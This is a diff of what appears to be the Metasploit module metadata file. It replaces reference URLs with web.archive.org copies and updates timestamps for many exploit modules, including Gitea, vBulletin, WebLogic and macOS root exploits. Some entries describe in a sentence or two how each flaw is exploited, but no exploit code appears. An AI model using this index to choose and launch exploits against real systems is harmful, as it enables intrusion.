-      "URL-https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/"
+      "URL-http://web.archive.org/web/20211209025818/https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/"
    ],
    "platform": "Linux,Unix,Windows",
    "arch": "cmd, x86, x64",
@@ -106234,7 +106426,7 @@
      "Windows Command",
      "Windows Dropper"
    ],
-    "mod_time": "2021-10-01 00:43:35 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/gitea_git_hooks_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitea_git_hooks_rce",
@@ -106517,7 +106709,7 @@
    "references": [
      "CVE-2018-1000533",
      "EDB-44548",
-      "URL-https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html"
+      "URL-http://web.archive.org/web/20200122054133/https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -106540,7 +106732,7 @@
    "targets": [
      "GitList v0.6.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/gitlist_arg_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlist_arg_injection",
@@ -106777,7 +106969,7 @@
      "CVE-2020-15867",
      "EDB-49571",
      "URL-https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/",
-      "URL-https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/"
+      "URL-http://web.archive.org/web/20211209025818/https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/"
    ],
    "platform": "Linux,Unix,Windows",
    "arch": "cmd, x86, x64",
@@ -106803,7 +106995,7 @@
      "Windows Command",
      "Windows Dropper"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/gogs_git_hooks_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gogs_git_hooks_rce",
@@ -107233,7 +107425,7 @@
    ],
    "description": "This module uses the VMware Hyperic HQ Groovy script console to execute\n        OS commands using Java. Valid credentials for an application administrator\n        user account are required. This module has been tested successfully with\n        Hyperic HQ 4.6.6 on Windows 2003 SP2 and Ubuntu 10.04 systems.",
    "references": [
-      "URL-https://pubs.vmware.com/vfabric5/topic/com.vmware.vfabric.hyperic.4.6/ui-Groovy.html"
+      "URL-http://web.archive.org/web/20161229045841/http://pubs.vmware.com/vfabric5/topic/com.vmware.vfabric.hyperic.4.6/ui-Groovy.html"
    ],
    "platform": "Linux,Unix,Windows",
    "arch": "",
@@ -107259,7 +107451,7 @@
      "Linux",
      "Unix CMD"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/hyperic_hq_script_console.rb",
    "is_install_path": true,
    "ref_name": "multi/http/hyperic_hq_script_console",
@@ -108101,8 +108293,8 @@
      "CVE-2015-8562",
      "EDB-38977",
      "EDB-39033",
-      "URL-https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html",
-      "URL-https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html",
+      "URL-http://web.archive.org/web/20250117165939/https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html",
+      "URL-http://web.archive.org/web/20250220041731/https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html",
      "URL-https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html",
      "URL-https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/",
      "URL-https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330",
@@ -108130,7 +108322,7 @@
    "targets": [
      "Joomla 1.5.0 - 3.4.5"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/joomla_http_header_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/joomla_http_header_rce",
@@ -109947,7 +110139,7 @@
    "description": "Moodle allows an authenticated administrator to define spellcheck settings via the web interface.\n          An administrator can update the aspell path to include a command injection. This is extremely\n          similar to CVE-2013-3630, just using a different variable.\n\n          This module was tested against Moodle version 3.11.2, 3.10.0, and 3.8.0.",
    "references": [
      "CVE-2021-21809",
-      "URL-https://talosintelligence.com/vulnerability_reports/TALOS-2021-1277"
+      "URL-http://web.archive.org/web/20250221153941/https://talosintelligence.com/vulnerability_reports/TALOS-2021-1277"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -109970,7 +110162,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-09-04 13:31:11 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/moodle_spelling_path_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/moodle_spelling_path_rce",
@@ -117117,7 +117309,7 @@
    "references": [
      "CVE-2015-7808",
      "EDB-38629",
-      "URL-http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq",
+      "URL-http://web.archive.org/web/20160608045552/http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq",
      "URL-http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/"
    ],
    "platform": "PHP",
@@ -117143,7 +117335,7 @@
      "vBulletin 5.0.X",
      "vBulletin 5.1.X"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/multi/http/vbulletin_unserialize.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vbulletin_unserialize",
@@ -117233,7 +117425,7 @@
    "references": [
      "CVE-2019-16759",
      "URL-https://seclists.org/fulldisclosure/2019/Sep/31",
-      "URL-https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html"
+      "URL-http://web.archive.org/web/20250117152609/https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html"
    ],
    "platform": "PHP,Unix,Windows",
    "arch": "cmd, php",
@@ -117258,7 +117450,7 @@
      "Unix (CMD In-Memory)",
      "Windows (CMD In-Memory)"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
@@ -120008,7 +120200,7 @@
      "URL-https://www.oracle.com/security-alerts/cpujan2023.html",
      "URL-https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_en_US.md",
      "URL-https://github.com/gobysec/Weblogic/blob/main/Weblogic_Serialization_Vulnerability_and_IIOP_Protocol_en_US.md",
-      "URL-https://github.com/4ra1n/CVE-2023-21839",
+      "URL-http://web.archive.org/web/20230831012940/https://github.com/4ra1n/CVE-2023-21839",
      "URL-https://www.fortiguard.com/outbreak-alert/oracle-weblogic-server-vulnerability"
    ],
    "platform": "",
@@ -120023,7 +120215,7 @@
    "targets": [
      "Linux"
    ],
-    "mod_time": "2023-06-09 12:24:35 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/iiop/cve_2023_21839_weblogic_rce",
@@ -120803,7 +120995,7 @@
    "references": [
      "EDB-44638",
      "CVE-2018-1000049",
-      "URL-https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/"
+      "URL-http://web.archive.org/web/20200809230426/https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution"
    ],
    "platform": "Linux,Windows",
    "arch": "",
@@ -120819,7 +121011,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/claymore_dual_miner_remote_manager_rce",
@@ -121502,7 +121694,7 @@
    ],
    "description": "This module takes advantage of the default configuration of the RMI Registry and\n        RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n        invokes a method in the RMI Distributed Garbage Collector which is available via every\n        RMI endpoint, it can be used against both rmiregistry and rmid,  and against most other\n        (custom) RMI endpoints as well.\n\n          Note that it does not work against Java Management Extension (JMX) ports since those do\n        not support remote class loading, unless another RMI endpoint is active in the same\n        Java process.\n\n          RMI method calls do not support or require any sort of authentication.",
    "references": [
-      "URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
+      "URL-http://web.archive.org/web/20110824060234/http://download.oracle.com:80/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
      "URL-http://www.securitytracker.com/id?1026215",
      "CVE-2011-3556"
    ],
@@ -121624,7 +121816,7 @@
      "Mac OS X PPC (Native Payload)",
      "Mac OS X x86 (Native Payload)"
    ],
-    "mod_time": "2023-10-09 17:58:00 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/java_rmi_server",
@@ -122476,7 +122668,7 @@
    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n          interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n          to execute code on the vulnerable host.",
    "references": [
      "CVE-2019-2725",
-      "URL-http://www.cnvd.org.cn/webinfo/show/4999",
+      "URL-http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999",
      "URL-https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html",
      "URL-https://twitter.com/F5Labs/status/1120822404568244224"
    ],
@@ -122503,7 +122695,7 @@
      "Windows",
      "Solaris"
    ],
-    "mod_time": "2023-03-22 12:52:15 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_asyncresponseservice",
@@ -123206,7 +123398,7 @@
    "references": [
      "CVE-2007-1286",
      "OSVDB-32771",
-      "URL-http://www.php-security.org/MOPB/MOPB-04-2007.html"
+      "URL-http://web.archive.org/web/20240619200429/http://php-security.org/MOPB/MOPB-04-2007.html"
    ],
    "platform": "Linux",
    "arch": "",
@@ -123238,7 +123430,7 @@
      "Linux x86 ProMA",
      "Linux x86 eGroupware"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/php/php_unserialize_zval_cookie.rb",
    "is_install_path": true,
    "ref_name": "multi/php/php_unserialize_zval_cookie",
@@ -123856,7 +124048,7 @@
      "URL-https://www.pentestgeek.com/2013/07/19/invoke-shellcode/",
      "URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
      "URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
-      "URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html",
+      "URL-http://web.archive.org/web/20171026182440/http://subt0x10.blogspot.com:80/2017/04/bypass-application-whitelisting-script.html",
      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
      "URL-https://iwantmore.pizza/posts/amsi.html",
      "URL-https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
@@ -123883,7 +124075,7 @@
      "Linux",
      "Mac OS X"
    ],
-    "mod_time": "2023-06-21 16:35:41 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -124070,7 +124262,7 @@
      "CVE-2021-27876",
      "CVE-2021-27877",
      "CVE-2021-27878",
-      "URL-https://www.veritas.com/content/support/en_US/security/VTS21-001"
+      "URL-http://web.archive.org/web/20250222002651/https://www.veritas.com/content/support/en_US/security/VTS21-001"
    ],
    "platform": "Linux,Windows",
    "arch": "",
@@ -124085,7 +124277,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2022-09-27 16:23:05 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/veritas/beagent_sha_auth_rce",
@@ -125286,7 +125478,7 @@
    "description": "This module exploits a race condition vulnerability in Mac's Feedback Assistant.\n        A successful attempt would result in remote code execution under the context of\n        root.",
    "references": [
      "CVE-2019-8565",
-      "URL-https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe",
+      "URL-http://web.archive.org/web/20190423083938/https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe",
      "URL-https://support.apple.com/en-in/HT209600",
      "URL-https://github.com/ChiChou/sploits"
    ],
@@ -125304,7 +125496,7 @@
      "Python payload",
      "Command payload"
    ],
-    "mod_time": "2023-04-28 19:52:15 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/osx/local/feedback_assistant_root.rb",
    "is_install_path": true,
    "ref_name": "osx/local/feedback_assistant_root",
@@ -125941,7 +126133,7 @@
    "description": "This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in\n        order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers\n        from a command injection vulnerability that can be exploited by creating a\n        specially crafted disk label.\n\n          The tmdiagnose binary uses awk to list every mounted volume, and composes\n        shell commands based on the volume labels. By creating a volume label with the\n        backtick character, we can have our own binary executed with root priviledges.",
    "references": [
      "CVE-2019-8513",
-      "URL-https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43",
+      "URL-http://web.archive.org/web/20201113192302/https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43",
      "URL-https://support.apple.com/en-in/HT209600",
      "URL-https://github.com/ChiChou/sploits"
    ],
@@ -125959,7 +126151,7 @@
      "Python payload",
      "Command payload"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/osx/local/timemachine_cmd_injection.rb",
    "is_install_path": true,
    "ref_name": "osx/local/timemachine_cmd_injection",
@@ -127376,8 +127568,8 @@
      "CVE-2017-8291",
      "URL-https://bugs.ghostscript.com/show_bug.cgi?id=697808",
      "URL-https://seclists.org/oss-sec/2017/q2/148",
-      "URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d",
-      "URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3"
+      "URL-http://web.archive.org/web/20240723023227/https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d",
+      "URL-http://web.archive.org/web/20240703041152/https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -127391,7 +127583,7 @@
    "targets": [
      "EPS file"
    ],
-    "mod_time": "2023-03-13 10:31:27 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb",
    "is_install_path": true,
    "ref_name": "unix/fileformat/ghostscript_type_confusion",
@@ -128677,7 +128869,7 @@
    ],
    "description": "This exploits a command execution in Pi-Hole <= 4.3.2.  A new DHCP static lease is added\n          with a MAC address which includes an RCE.  Exploitation requires /opt/pihole to be first\n          in the $PATH due to exploitation constraints.  DHCP server is not required to be running.",
    "references": [
-      "URL-https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/",
+      "URL-http://web.archive.org/web/20230521153651/https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/",
      "CVE-2020-8816"
    ],
    "platform": "Unix",
@@ -128701,7 +128893,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pihole_dhcp_mac_exec",
@@ -128801,7 +128993,7 @@
    "description": "This module exploits a command injection vulnerability in Quest KACE\n        Systems Management Appliance version 8.0.318 (and possibly prior).\n\n        The `download_agent_installer.php` file allows unauthenticated users\n        to execute arbitrary commands as the web server user `www`.\n\n        A valid Organization ID is required. The default value is `1`.\n\n        A valid Windows agent version number must also be provided. If file\n        sharing is enabled, the agent versions are available within the\n        `\\kace.local\\client\\agent_provisioning\\windows_platform` Samba share.\n        Additionally, various agent versions are listed on the KACE website.\n\n        This module has been tested successfully on Quest KACE Systems\n        Management Appliance K1000 version 8.0 (Build 8.0.318).",
    "references": [
      "CVE-2018-11138",
-      "URL-https://support.quest.com/product-notification/noti-00000134",
+      "URL-http://web.archive.org/web/20210508161500/https://support.quest.com/product-notification/noti-00000134",
      "URL-https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
    ],
    "platform": "Unix",
@@ -128825,7 +129017,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/http/quest_kace_systems_management_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/http/quest_kace_systems_management_rce",
@@ -129236,7 +129428,7 @@
    "description": "Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.\n       This allows the attacker to execute arbitrary php code as the context of the web user.",
    "references": [
      "URL-https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/",
-      "URL-https://paper.seebug.org/397/"
+      "URL-http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -129259,7 +129451,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/http/xdebug_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/xdebug_unauth_exec",
@@ -131847,7 +132039,7 @@
    "references": [
      "OSVDB-83891",
      "BID-54464",
-      "URL-http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
+      "URL-http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -131870,7 +132062,7 @@
    "targets": [
      "EGallery 1.2"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/egallery_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/egallery_upload_exec",
@@ -133416,7 +133608,7 @@
      "OSVDB-88825",
      "BID-57082",
      "EDB-25304",
-      "URL-http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f",
+      "URL-http://web.archive.org/web/20221221070124/http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f",
      "URL-http://wiki.python.org/moin/WikiAttack2013"
    ],
    "platform": "Unix",
@@ -133440,7 +133632,7 @@
    "targets": [
      "MoinMoin 1.9.5"
    ],
-    "mod_time": "2021-04-07 06:12:25 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/moinmoin_twikidraw.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/moinmoin_twikidraw",
@@ -136157,7 +136349,7 @@
      "CVE-2005-2877",
      "OSVDB-19403",
      "BID-14834",
-      "URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev"
+      "URL-http://web.archive.org/web/20230609051423/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -136180,7 +136372,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/twiki_history.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/twiki_history",
@@ -136262,7 +136454,7 @@
      "CVE-2004-1037",
      "OSVDB-11714",
      "BID-11674",
-      "URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch"
+      "URL-http://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -136285,7 +136477,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/twiki_search.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/twiki_search",
@@ -136843,7 +137035,7 @@
      "OSVDB-82653",
      "BID-53809",
      "EDB-18993",
-      "URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html",
+      "URL-http://web.archive.org/web/20150106144832/http://www.opensyscom.fr:80/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html",
      "WPVDB-6106"
    ],
    "platform": "PHP",
@@ -136867,7 +137059,7 @@
    "targets": [
      "asset-manager <= 2.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_asset_manager_upload_exec",
@@ -137103,7 +137295,7 @@
    "references": [
      "OSVDB-83637",
      "WPVDB-7569",
-      "URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
+      "URL-http://web.archive.org/web/20170203203305/http://www.opensyscom.fr:80/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -137126,7 +137318,7 @@
    "targets": [
      "Front-End Editor 2.2.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_frontend_editor_file_upload",
@@ -137312,7 +137504,7 @@
      "WPVDB-10011",
      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
-      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+      "URL-http://web.archive.org/web/20250117161327/https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -137335,7 +137527,7 @@
    "targets": [
      "InfiniteWP Client < 1.9.4.5"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -137957,7 +138149,7 @@
      "OSVDB-82656",
      "BID-53787",
      "EDB-18987",
-      "URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html",
+      "URL-http://web.archive.org/web/20150103065650/http://www.opensyscom.fr:80/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html",
      "WPVDB-6225"
    ],
    "platform": "PHP",
@@ -137981,7 +138173,7 @@
    "targets": [
      "wp-property <= 1.35.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_property_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_property_upload_exec",
@@ -138599,7 +138791,7 @@
    "references": [
      "CVE-2016-2056",
      "PACKETSTORM-135758",
-      "URL-https://lists.xymon.com/pipermail/xymon/2016-February/042986.html",
+      "URL-http://web.archive.org/web/20240519104648/https://lists.xymon.com/pipermail/xymon/2016-February/042986.html",
      "URL-https://www.securityfocus.com/archive/1/537522/100/0/threaded",
      "URL-https://sourceforge.net/p/xymon/code/7892/",
      "URL-https://www.debian.org/security/2016/dsa-3495"
@@ -138628,7 +138820,7 @@
      "Solaris",
      "BSD"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/unix/webapp/xymon_useradm_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/xymon_useradm_cmd_exec",
@@ -138822,7 +139014,7 @@
      "CVE-2013-0232",
      "OSVDB-89529",
      "EDB-24310",
-      "URL-http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/"
+      "URL-http://web.archive.org/web/20211207213730/https://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -138845,7 +139037,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/zoneminder_packagecontrol_exec",
@@ -139620,7 +139812,7 @@
    "references": [
      "CVE-2017-8895",
      "VTS-17-006",
-      "URL-https://www.veritas.com/content/support/en_US/security/VTS17-006.html"
+      "URL-http://web.archive.org/web/20181112174302/https://www.veritas.com/content/support/en_US/security/VTS17-006.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -139645,7 +139837,7 @@
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
    ],
-    "mod_time": "2023-07-14 12:46:26 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/backupexec/ssl_uaf",
@@ -140894,7 +141086,7 @@
    "references": [
      "CVE-2015-0318",
      "URL-http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html",
-      "URL-https://code.google.com/p/google-security-research/issues/detail?id=199"
+      "URL-http://web.archive.org/web/20160110043607/https://code.google.com/p/google-security-research/issues/detail?id=199"
    ],
    "platform": "Windows",
    "arch": "",
@@ -140908,7 +141100,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_pcre.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_pcre",
@@ -141040,7 +141232,7 @@
      "ZDI-11-276",
      "URL-http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/",
      "URL-http://www.adobe.com/support/security/bulletins/apsb11-21.html",
-      "URL-http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html"
+      "URL-http://web.archive.org/web/20170111122134/http://0x1byte.blogspot.com:80/2011/11/analysis-of-cve-2011-2140-adobe-flash.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -141056,7 +141248,7 @@
      "IE 6 on Windows XP SP3",
      "IE 7 on Windows XP SP3 / Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_sps.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_sps",
@@ -141367,7 +141559,7 @@
      "CVE-2009-3459",
      "BID-36600",
      "OSVDB-58729",
-      "URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
+      "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/",
      "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
    ],
    "platform": "Windows",
@@ -141382,7 +141574,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
